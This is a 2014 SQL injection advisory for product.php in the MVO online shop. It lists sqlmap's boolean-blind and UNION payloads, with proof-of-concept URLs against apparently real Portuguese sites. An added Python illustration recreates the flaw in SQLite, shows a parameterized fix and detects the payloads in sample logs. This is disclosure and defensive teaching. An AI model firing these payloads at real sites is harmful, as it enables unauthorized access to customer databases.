# SQL Injection on MVO - Máquina Vendas Online

# Risk: High

# CWE number: CWE-89

# Date: 13/10/2014

# Vendor: adnweb.es

# Author: Felipe " Renzi " Gabriel

# Contact: renzi@linuxmail.org

# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906

# Vulnerable File: product.php

# Exploits: http://www.targXet.pt/product.php?id=[SQLI]


# PoC:      http://www.florXes.pt/product.php?id=31


--- "SQLI using SQLMAP." ---
         
    Place: GET
    Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31' AND 7612=7612 AND 'AUyP'='AUyP

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=31' UNION ALL SELECT CONCAT(0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

---
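The advisory only reproduces sqlmap's output. As an added illustration that is not part of the original advisory and not adnweb.es code, the Python script below recreates the CWE-89 pattern against a constructed SQLite table, shows why the quoted boolean-based payload works as a true/false oracle, places the parameterized query beside it as the fix, and flags the two quoted payloads in constructed web-server log lines. The table schema, product names, and log lines are assumptions; nothing here is taken from the vendor's product.php.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the shop's product table; the real schema behind
# product.php is not given in the advisory, so this is an assumption.
PRODUCTS = [(31, "Rosa vermelha"), (32, "Tulipa amarela")]


def open_db():
    """Build an in-memory SQLite database seeded with the sample products."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO product VALUES (?, ?)", PRODUCTS)
    return con


def vulnerable_lookup(con, product_id):
    """The CWE-89 pattern: the request parameter is pasted into the SQL text.

    With id=31' AND 7612=7612 AND 'AUyP'='AUyP the WHERE clause becomes
        id='31' AND 7612=7612 AND 'AUyP'='AUyP'
    which is true, while 7612=7613 makes it false: that difference in the
    response is the oracle boolean-based blind injection reads from.
    """
    sql = f"SELECT id, name FROM product WHERE id='{product_id}'"
    return con.execute(sql).fetchall()


def safe_lookup(con, product_id):
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not str(product_id).isdigit():
        return []  # a product id is a number; anything else is rejected
    sql = "SELECT id, name FROM product WHERE id = ?"
    return con.execute(sql, (int(product_id),)).fetchall()


# Signatures of the two sqlmap techniques quoted in the advisory, applied to
# the URL-decoded request target. They are detection heuristics, not a parser.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"'\s+AND\s+\d+=\d+\s+AND\s+'", re.I)),
    ("UNION query", re.compile(r"UNION\s+ALL\s+SELECT", re.I)),
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def flag_injection_requests(log_lines):
    """Return (index, technique) for each access-log line that matches a signature."""
    hits = []
    for n, line in enumerate(log_lines):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = unquote(m.group(1))  # decode %27, %20, ... before matching
        for name, pattern in SIGNATURES:
            if pattern.search(target):
                hits.append((n, name))
                break
    return hits


# Constructed Apache-style log lines: a normal request followed by the two
# payloads from the advisory, URL-encoded as a client would send them.
LOG_LINES = [
    '203.0.113.5 - - [13/Oct/2014:10:00:00 +0100] "GET /product.php?id=31 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Oct/2014:10:00:02 +0100] "GET /product.php?id=31%27%20AND%207612%3D7612%20AND%20%27AUyP%27%3D%27AUyP HTTP/1.1" 200 5120',
    '203.0.113.5 - - [13/Oct/2014:10:00:03 +0100] "GET /product.php?id=31%27%20UNION%20ALL%20SELECT%20CONCAT(0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 3100',
]


if __name__ == "__main__":
    con = open_db()
    oracle_true = "31' AND 7612=7612 AND 'AUyP'='AUyP"
    oracle_false = "31' AND 7612=7613 AND 'AUyP'='AUyP"
    print("vulnerable, true  :", vulnerable_lookup(con, oracle_true))
    print("vulnerable, false :", vulnerable_lookup(con, oracle_false))
    print("safe, payload     :", safe_lookup(con, oracle_true))
    print("safe, id=31       :", safe_lookup(con, "31"))
    print("flagged requests  :", flag_injection_requests(LOG_LINES))
```

The two lookups differ only in how the value reaches the database: string formatting makes the quote in the payload part of the SQL grammar, while a bound parameter keeps it a literal that matches no row. The log check is the kind of low-cost signature a WAF rule or SIEM query can carry while the application is being fixed; it catches these two payload shapes, not injection in general.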


# Thanks